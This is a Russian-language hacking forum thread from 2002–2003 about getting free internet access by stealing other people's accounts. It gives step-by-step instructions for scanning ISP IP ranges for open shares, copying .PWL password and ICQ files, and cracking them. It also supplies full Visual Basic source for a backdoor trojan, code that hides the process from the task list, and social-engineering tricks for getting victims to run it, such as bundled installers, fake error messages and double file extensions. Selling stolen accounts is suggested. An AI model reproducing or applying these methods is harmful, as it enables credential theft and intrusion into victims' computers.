Халявный инет

Discussion in 'Болталка' started by timonkiller, 11 Dec 2002.

Thread Status:
Not open for further replies.
  1. timonkiller

    timonkiller New Member

    Joined:
    18 Sep 2002
    Messages:
    45
    Likes Received:
    1
    Reputations:
    0
    Приветствую того, кто видет енту тему!!
    Ну что готов к халяве?! Вижу, по лицу что да. [​IMG] Расскажу я тебе сейчас про халявный инет, история не новая, но мож кто о ней и не знает. Сразу же говорю, это преследуется по закону! Читая этот материал, очень рекомендую тебе вспомнить о содержании понятия "личная ответственность" и всего с ним связано. Говоря иначе - сейчас у тебя молоток. Как им распорядиться - дело твоё сугубо личное. Можешь забить им гвоздик в стенку, а можешь и в голову соседа. И то и другое на твое совести. Не перепутай ничего.
      Итак приступим. Сразу скажу, это самый простой и быстрый способ по тыринью чужих пасов. Для начала всех операций лезем в свойства сетевого подключения и там ставим галочки на "сделать файлы и папки этого компьютера общими" и "сделать принтеры этого компьютера общими". Теперь надо скачать любой Share-сканер. Я выбрал для себя Essential NetTools. Вводим диапазон IP-адрессов и ждем. Когда откроется список компов юзеров, нам надо искать таких, у которых бы в пункте RS стояло бы Yes. Тыкаем на него правой кнопой мыши и жмем там Open Computer. Конечно, если у юзера там нет паса или он забыл закрыть диски, то все хорошо. Если открылось окно сетевого окружения и в нем видно папку под названием C, знайте, вы нашли это! Лезем туда. Теперь если хотите стянуть Uin, дуйте в папку Program Files/Icq/(версия ICQ)/ и тянем файл 685859(Uin).dat./ Расшифровывать его можно многими прогами. Рекомендую ICQr informator. Первая часть сделана. Далее лезем в папку Windows. И ищем файл с разрешением *.PWL . ОК. Тянем и его. Ну, на это расшифровщиков куча. Вот вам простой способ добычи полезных вещей. Но сканеры очень часто дают сбой. Поэтому, лучше это делать ручками, прямо из Сетевого окружения. Вот несколько диапазонов IP провайдеров Москвы. MTU.RU 212.188.19.* Arstel 195.133.205.* CNT 212.15.118.* MTU.RU 212.188.19.* Arstel 212.248.5.* CNT 212.15.119.* ROSNET 195.90.132.* Arstel 194.87.6.* avallon 212.176.20.* ORC.RU 212.48.130.* Arstel 195.28.32.* ASVT 212.46.0.* IPC 195.218.161.* Arstel 169.254.76.* RINET 195.54.192.* com2com 195.98.160.* GLASNET 195.218.251.* RINET 195.91.140.* Microdin 195.128.72.* GLASNET 195.90.128.* RINET 195.91.141.* CORBINA 195.14.32.* GLASNET 194.154.81 .* comstar 195.210.130.* RosPrint 195.151.155.* GLASNET 195.90.132.* comstar 212.248.6.* adicom 212.248.74.* GLASNET 194.154.91.* Netline 195.34.20.* dol.ru 195.210.136.* GLASNET 195.218.128.* PlusNet 195.2.81.* magelan 212.11.193.* GLASNET 195.90.130.* MTU 212.188.97.* comtel 195.208.64.* IP COM 195.222.180.* MTU 212.188.103.* COL.RU 195.210.132.* CNT 212.15.120.* MTU 212.188.97.*

                                      !!Усё!!

    з.ы.
    Способ действующий, сам проверял, так что претензий быть не должно.
    з.з.ы
    писать с ошибками моё любимое дело!  [​IMG]
     
  2. timonkiller

    timonkiller New Member

    Joined:
    18 Sep 2002
    Messages:
    45
    Likes Received:
    1
    Reputations:
    0
    Кстати, сканер можно взять и другой, например Shared Resource Scanner. Очень неплохой сканер, довольно быстрый, скачать можно с http://www.cnt.ru/~wh/download/index.html#scan
     
  3. timonkiller

    timonkiller New Member

    Joined:
    18 Sep 2002
    Messages:
    45
    Likes Received:
    1
    Reputations:
    0
    Для прочитки PWL мона взять PWLTool. Качаем с http://www.scanner.narod.ru/pwltool.zip прочитайте обязательно readme заархивированном файле!
     
  4. timonkiller

    timonkiller New Member

    Joined:
    18 Sep 2002
    Messages:
    45
    Likes Received:
    1
    Reputations:
    0
    Там в диапазонах IP я указывал  вконце *. Вместо звёздочек нужно ввести массив, например
    212.188.19.*  меняем, получаеться первый адресс диапазона в сканере будет такой 212.188.19.1 а второй будет 212.188.19.254
     
  5. iRedX

    iRedX Elder - Старейшина

    Joined:
    18 Jun 2002
    Messages:
    117
    Likes Received:
    11
    Reputations:
    9
    =>Timon Killer

    Ты расказал хороший способ добычи фринета, это не плохо работает, но..., этот способ для крупных городов..., в смысле..., я хочу сказать что к примеру есть города там где только ОДИН пров, к которому можно подключаться..., а инет в основном только в инет клубах. Редко у кого дома инет есть..., к тому же он так дорог что каждый считает свой трафик, ХРЕН ПОХАКАЕШЬ. Хотя..., есть народные умельцы которые добывают себе фринет и в таких условиях.
     
  6. timonkiller

    timonkiller New Member

    Joined:
    18 Sep 2002
    Messages:
    45
    Likes Received:
    1
    Reputations:
    0
    =>RedX
      На мой взгляд есть два способа решения этой проблемы:
    1. Продовать ворованные аккуанты, а потом на, вырученные от продажи, деньги сидеть.
    2.Некоторые провы разрешают сидеть двум пользователям с одного аккуанта, поэтому можно высчитать когда примерно пользователь будет в инете, а потом подключаться самому.
       Хочу добавить насчёт второго способа. Я так сидел когда у меня не было денег оплатить инет. Пров был РОЛ. Вобщем я звонил челу, узнавая сидит ли он в инете, если занято в течении 5 минут, то я подключался. Способ этот на удачу.
     
  7. iRedX

    iRedX Elder - Старейшина

    Joined:
    18 Jun 2002
    Messages:
    117
    Likes Received:
    11
    Reputations:
    9
    => Timon Killer

    С первам пунктом тоже выход, а второй..., :) кому как повезёт.
     
  8. timonkiller

    timonkiller New Member

    Joined:
    18 Sep 2002
    Messages:
    45
    Likes Received:
    1
    Reputations:
    0
    Здравствуйте, дорогие мои! [​IMG] Если вы думаете добычу халявного инета я закончил, то вы глубоко ошибаетесь! У меня ещё припасены многие щтучки-дрючки! [​IMG]
    Начну с предисловия. Много раз я прокалывался со сканированием диапазонов на расшареные ресурсы, и поэтому решил пойти дальше. Сегодня я расскажу вам как добыть аккуант с помощю "Трояна". Я знаю вы скажете: "Во блин, ды я сам знаю как воровать пасс/логин с помощью троя!", но сегодня я предлагаю другое. Я вам расскажу, как написать троян на Visual Basic.
    Вам потребуется компилятор ВБ, и эта статья. Вам не нужны какие либо познания в ВБ, потомучто я всё разжевал до мелочей. Итак начнём.

    ..:: Как написать свой троян на Visual Basic (manual для начинающих) ::..

    Троянов на виртуальном свете много. Какие - то становятся известными, другие остаются незамеченными. Вообще признанные трояны вещь испытанная и казалось бы что тут выбирать[​IMG] Но антивирусы совершенствуются, и рано или поздно известные трояны обнаруживаются ими. Может быть это и хорошо, ведь это даёт толчок (от слова толкать :)) нашим троянописцам на написание новых троянчиков. Ну ладно, если грамотно писать код, то никакие AVP мониторы нас не обнаружат. Ну а если готовый троян, что самое худшее, отсылает результаты ёще и на мыло автора[​IMG] Остаётся единственный выход - писать пони самому. В этой статье будем писать BackDoor троян. То есть троян, который открывает как бы черный вход, заднюю дверь. Состоит он из двух частей - сервера и клиента. Сервер - та часть, которая закидывается на машину жертвы и открывает нам эту самую заднюю дверь (порт), и ждёт там нас. Он также скрывается от таск монитора (Ctrl+Alt+Del) и прописывается в автозагрузке. Клиент - часть трояна, которая остаётся у нас и с её помощью мы подключаемся к отрытому порту. Начнём с сервера.


    1. Сервер
    Создаём новый проект (стандартный exe'шник) и к первой форме (по умолчанию Form1) добавляем Winsock control. Делается это так: меню "Проект"->"Компоненты" ("Project"->"Components"), выбираем там Micosoft Winsock control. Если такового нету, то жмём "Обзор" ("Browse") и находим файл mswinsck.ocx на жёстком диске. Жмём "ок" и у нас появляется кнопка в панели инструментов с изображением двух компьютеров. После этого помещаем его на форму и задаём имя "ws". В свойствах этого компонента в параметр "LocalPort" вписываем номер порта, например 31337. Теперь изменяем и саму форму: убираем заголовок и в свойствах изменяем параметр "Visible" на False. Теперь переключаемся на написание кода. Выбираем сверху из выпадающего меню Form, а из другого, рядом с ним, Load.И здесь пишем:

    Private Sub Form_Load()
    Do
    If ws.State <> sckConnected And ws.State <> sckListening Then
    ws.Close
    ws.Listen
    End If
    DoEvents
    Loop
    End Sub

    Это значит если не установлено никакого соединения сервер закрывает связь и слушает порт 31337 в ожидании нас. Далее нужно выбрать из того же верхнего меню "ws", а из другого "ConnectionRequest" и пишем:

    Private Sub ws_ConnectionRequest(ByVal requestID As Long)
    ws.Close
    ws.Accept requestID
    End Sub

    Это значит как только клиент начинает подключаться, сервер перестаёт слушать порт и соединяет его. Теперь выбираем код для ws и DataArrival и пишем следущее:

    Private Sub ws_DataArrival(ByVal bytesTotal As Long)
    Dim Data As String
    ws.GetData Data

    Select Case Data
    Case "BEEP"
    Beep
    Case "MSG"
    MsgBox "Die, Lamo!", vbInformation, "Die, Lamer!"
    Case "END"
    End
    End Select
    End Sub

    Это команды, которые могут прийти с сервера. Конечно не все. "Beep" - сигнал динамика у жертвы. "MSG" - сообщение (вместо "Die, Lamo!" и "Die, Lamer!" можно вставить своё) "END" - закрытие сервера. Если придёт команда закрытия сервера, вы не сможете больше подлючиться (Если только сервер не прописан в автозагрузке. В этом случае сможете подлючиться после перезагрузки машины жертвы). ВСЁ!!! Поздравляю! Вы написали сервер для вашего трояна! Остаётся создать servak.exe. (Файл->Создать... ; File->Create...)

    Ну что ж, сервер мы сделали. Пора приступать созданию самой интересной и короткой части нашего трояна. Вот здесь не будет никакой скрытности. ВОТ ТУТ ДАЙ ВОЛЮ СВОЕМУ РАЗЫГРАВШЕМУСЯ ВООБРАЖЕНИЮ!!!

    2.Клиент.


    Значит так: создавай проект и можешь как хочешь изуродовать (или наоборот) форму (и проект), но главное чтобы на ней были 5 основных кнопок и два текстовых поля. А ещё надо перетащить на форму компонент Winsock Control (как это сделать описано выше). Имена у кнопок не меняем. А вот то, что на них написано (Caption) нужно поменять (Подключиться, отключиться, закрыть сервак, сообщение, бип). Текстовым полям нужно дать такие имена: IP и Port. В текстовое поле Port можно сразу вписать 31337(Параметр Text), т.к. наш сервер слушает только этот порт, и даже сделать недоступным (Параметр "Locked" - True). В коде сделаем так чтобы отображался наш IP. Вот как это делается: (Меню Form и Load)

    Private Sub Form_Load()
    IP.Text = ws.LocalIP
    End Sub

    Теперь пишем код дальше:

    Private Sub Command1_Click()
    ws.Close
    ws.RemoteHost = IP
    ws.RemotePort = Port
    ws.Connect
    End Sub

    Private Sub Command2_Click()
    ws.Close
    End Sub

    Всё это значит, что при нажатии кнопки "Подключиться"(Command_1) мы подключаемся к указанному IP - адресу, а при нажатии отключиться(Command_2) просто закроем связь.

    Private Sub Command3_Click()
    If ws.State <> sckConnected Then Exit Sub
    ws.SendData "BEEP"
    End Sub

    Private Sub Command4_Click()
    If ws.State <> sckConnected Then Exit Sub
    ws.SendData "MSG"
    End Sub

    Private Sub Command5_Click()
    If ws.State <> sckConnected Then Exit Sub
    ws.SendData "END"
    End Sub

    А эти кнопки(сообшение, бип, закрыть сервак) отправляют команды, если соединение уже установлено. ВСЁ!!! ПОЗДРАВЛЯЮ!!! Создай client.exe. Ты сделал клиента для своего трояна. Да ты вообще троян написал!!! Ну я немножко помог, но это не считается. Можешь считать себя крутым троянописцем:))) Можешь протестировать свой троян: запусти сначала servak.exe(его не будет видно на экране, только в таскбаре), а потом client.exe и подключись к самому себе. Если ты не к чему не подключён, то твой IP будет 127.0.0.1. Теперь выход в свет. Закинь на комп жертве servak.exe и заставь запустить. Узнай IP адрес своего заклятого друга и вводи, когда он будет в Инете или с тобой по модему.

    Всё, трой мы написали. Теперь надо впарить троян, сеёчас я расскажу как это делать.
     
  9. timonkiller

    timonkiller New Member

    Joined:
    18 Sep 2002
    Messages:
    45
    Likes Received:
    1
    Reputations:
    0
    1.Самый простой способ это склеить твой троян с другим exe'шником (с прогой например, интересной) и замаскировать его под что - то типа "прога.dll", но это опять же только для ламеров. Надо и иконку соответствующую прилепить. Тогда, ламак запускает прогу и ещё твой троян, но незаметно для него. Прекрасно для этих целей подходит прога Joiner. А для смены иконки Micro Angelo. Это лучше использовать тогда, когда троян высылается на мыло, в архиве например.

    2.А ещё лучше создать сетуп для твоей проги. Тогда юзер ушастый инсталлирует твою прогу и во время инсталла на его винт, куда - нить в укромную папочку проинсталлит твой троян. Причём во многих сетуп мастерах("Wise installer", "Create Setup") есть такая фенька: после установки запускать какой - нить файл незаметно для юзверя. Тоже отличный способ.

    3. Можно сделать так: твой троян после запуска выдаёт сообщение об ошибке. Нужно сделать эту ошибку максимально реалистичной. Юзер расстраивается, увидев, что такая классная по твоим словам прога не запускается, и плюет на это дело. А пони тем временем уже сделала своё грязное дело.

    4.В ICQ файл wetpussy.jpg_.exe будет выглядеть как фотка. Этим тоже можно воспользоваться.

    5. Если троян в самораспаковывающемся архиве, то воспользуйся фишкой: "When done open "nameofyourtrojan.exe"

    6. Можно просканить комп врага на шары. Для одарённых: расшаренные ресурсы - файлы, диски, папки, принтеры открытые для совместного доступа. Если у него полностью расшарен диск или папка, заливай троян и запускай.
     
  10. Dr.Frank

    Dr.Frank Elder - Старейшина

    Joined:
    31 Jul 2002
    Messages:
    301
    Likes Received:
    72
    Reputations:
    12
    Код в начало проги(сервера) для того, чтобы её не было видно в списке задач windows:
    Option Explicit
    Private Declare Function RegisterServiceProcess Lib "kernel32.dll"  _
                             (ByVal dwProcessId As Long, ByVal dwType As Long) As Long

    Private Declare Function GetCurrentProcessId Lib "kernel32.dll" () As Long


    Private Sub form_load()
         Call RegisterServiceProcess(GetCurrentProcessId, 1)
    End Sub


    [​IMG]  [​IMG]  [​IMG]  [​IMG]  [​IMG]
     
  11. timonkiller

    timonkiller New Member

    Joined:
    18 Sep 2002
    Messages:
    45
    Likes Received:
    1
    Reputations:
    0
    </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата </td></tr><tr><td id="QUOTE">Код в начало проги(сервера) для того, чтобы её не было видно в списке задач windows:
    Option Explicit

    Private Declare Function GetCurrentProcessId Lib &quot;kernel32.dll&quot; () As Long


    Private Sub form_load()
        Call RegisterServiceProcess(GetCurrentProcessId, 1)
    End Sub
    [/QUOTE]<span id='postcolor'>
    [​IMG] &nbsp;[​IMG] &nbsp;[​IMG] &nbsp;круто!!
     
  12. Guest

    Guest Guest

    Reputations:
    0
    Когда сканирую своего провайдера, net tools выдает только мой айпишник, как будто я один подключен к нету. Что за хрень?
    [email protected]
     
  13. Guest

    Guest Guest

    Reputations:
    0
    Dr.Frank, твой способ не работает в Win2k. Здесь надо изощряться.
    И ещё, для тех, кто хочет попробывать халявы сообщу, что пол года назад у меня двух друзей посадили. Они делали именно вашими способами [​IMG]. Не забывайте, что у многих провайдеров есть АОН, и любой ламмер может посмотреть, кто и когда пользовался его доступом.
     
  14. Guest

    Guest Guest

    Reputations:
    0
    Кстати, у PWLTool, который здесь выложели прошла регистрация. Где можно нормальный достать?
     
  15. planar

    planar New Member

    Joined:
    15 Jan 2003
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    Кстати, о птичках. Если вставить в пароль какие-нибкрь символы пунктуации и сделать пароль длиннее чем 11 символов - PWL на свалке.
     
  16. planar

    planar New Member

    Joined:
    15 Jan 2003
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    Все это конечно прекрасно, но для того, чтобы троян на VB сработал, нужно чтобы и VBxxx.dll стоял и нужный .OCX, иначе ничего не выйдет.
     
  17. Guest

    Guest Guest

    Reputations:
    0
    Ну есть у меня PWl, я его расшифровал и получил пароль, а где ligin???
     
  18. timonkiller

    timonkiller New Member

    Joined:
    18 Sep 2002
    Messages:
    45
    Likes Received:
    1
    Reputations:
    0
    </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата </td></tr><tr><td id="QUOTE">Ну есть у меня PWl, я его расшифровал и получил пароль, а где ligin??? [/QUOTE]<span id='postcolor'>
    Чем расшифровал то?
     
  19. Guest

    Guest Guest

    Reputations:
    0
    Пасшифровал PWL&amp;NetTools. Парольесть а ника нет &nbsp;[​IMG]. А он там же должен быть?
     
  20. Guest

    Guest Guest

    Reputations:
    0
    Вот пример того, что я получил после расшифровки:

    File: E:\1.PWL
    User name: '1'
    Password: ''

    Dial-up:'*Rna\Ul\yakor'
    Password:'111111'- это, как я понимаю пароль(изменил специально [​IMG] ), а где login?
    Dial-up:'*Rna\vpn\ckc'
    Password:'111111'

    Наверное, я не туда смотрю, подскажите где он.
    Заранее благодарю.
     
Thread Status:
Not open for further replies.